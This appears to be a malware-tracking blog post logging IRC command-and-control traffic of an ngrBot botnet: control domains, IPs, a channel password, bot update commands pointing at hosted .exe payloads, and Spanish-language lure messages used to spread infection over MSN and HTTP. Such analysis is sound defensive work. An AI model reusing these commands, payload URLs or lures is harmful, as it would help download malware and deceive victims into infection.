elperro23.net(ngrBot hosted in United States Seattle Dme Hosting Llc)

Domains used to control bots:
elperro23.net
elperro3.net

Resolved : [elperro23.net] To [74.221.210.169]

Remote Host Port Number
199.15.234.7 80
217.160.124.219 80
74.221.210.169 5236 PASS ROCKR

PRIVMSG #rockspread :[HTTP]: Updated HTTP spread message to “Mira esta postal de amor q me enviaron http://www.anrodphoto.com/entretenimiento.terra.com/postaldeamor esta muy linda :)”
PRIVMSG #ROCK :[DNS]: Blocked 0 domain(s) – Redirected 20 domain(s)
NICK n{US|XPa}rvtvjgd
USER rvtvjgd 0 0 :rvtvjgd
JOIN #ROCK ngrBot
JOIN #rockspread
PRIVMSG #rockspread :[MSN]: Updated MSN spread interval to “5”
PRIVMSG #rockspread :[HTTP]: Updated HTTP spread interval to “5”
PRIVMSG #rockspread :[MSN]: Updated MSN spread message to “Mira esta postal de amor q me enviaron http://www.anrodphoto.com/entretenimiento.terra.com/postaldeamor esta muy linda 🙂 |”

Now talking in #ROCK
Topic On: [ #ROCK ] [ ,mdns http://www.anrodphoto.com/wp-content/plugins/do.txt | ,j #rockspread | ,up http://www.anrodphoto.com/wp-content/plugins/9upjmrlzz.exe 24A3AF8782C75ACC45C4BAA110EA6F70 ]
Topic By: [ rockstar ]
rockstar sets mode: +o rockstar

Now talking in #rockspread
Topic On: [ #rockspread ] [ ,msn.int 5 | ,http.int 5 | ,msn.set Mira esta postal de amor q me enviaron http://www.anrodphoto.com/entretenimiento.terra.com/postaldeamor esta muy linda 🙂 | ,http.set Mira esta postal de amor q me enviaron http://www.anrodphoto.com/entretenimiento.terra.com/postaldeamor esta muy linda 🙂 ]
Topic By: [ rockstar ]

UPDATE:
C&C Server: 199.119.205.77:5236
Server Password:
Username: bswicfv
Nickname: n{DE|XPa}bswicfv
Channel: #ROCK (Password: ngrBot)
Channeltopic: :,mdns http://imatchclub.com/_themes/main/new_age/css/domi.txt | ,up http://imatchclub.com/_themes/main/new_age/css/10upjmrlzz.exe 1B52EEAF196290FADE3A8C1AD62A8710 | ,j #rockspread

UPDATE:
Remote Host Port Number
184.22.118.196 5236 PASS ROCKR

NICK n{US|XPa}ghzgyxn
USER ghzgyxn 0 0 :ghzgyxn
JOIN #ROCK ngrBot
JOIN #rockspread
PRIVMSG #ROCK :[DNS]: Blocked 0 domain(s) – Redirected 28 domain(s)

UPDATE:
Remote Host Port Number
187.17.123.243 80
199.15.234.7 80
81.31.145.6 80
199.193.252.177 5236 PASS ROCKR

PRIVMSG #rockspread :[HTTP]: Updated HTTP spread interval to “5”
PRIVMSG #ROCK :[DNS]: Blocked 0 domain(s) – Redirected 24 domain(s)
PRIVMSG #ROCK :[d=”http://www.antiquitebonton.it/wp-content/plugins/updates/16upjmrlzz.exe” s=”116236 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataWcxaxw.exe” – Download retries: 0
NICK n{US|XPa}gukijqs
USER gukijqs 0 0 :gukijqs
JOIN #ROCK ngrBot
JOIN #rockspread
PRIVMSG #rockspread :[MSN]: Updated MSN spread message to “mira esta foto del accidente de JENIFER LOPEZ http://www.worldcounselling.com/IMG00359268.JPG su rostro quedo horrible. |”
PRIVMSG #rockspread :[HTTP]: Updated HTTP spread message to “mira esta foto del accidente de JENIFER LOPEZ http://www.worldcounselling.com/IMG00359268.JPG su rostro quedo horrible. |”
PRIVMSG #rockspread :[MSN]: Updated MSN spread interval to “5”

The data identified by the following URLs was then requested from the remote web server:
http://www.aprendemos.xpg.com.br/wp-content/plugins/updates/do.txt
http://api.wipmania.com/
http://www.antiquitebonton.it/wp-content/plugins/updates/16upjmrlzz.exe

hosting infos:
http://whois.domaintools.com/74.221.210.169

Categories: Uncategorized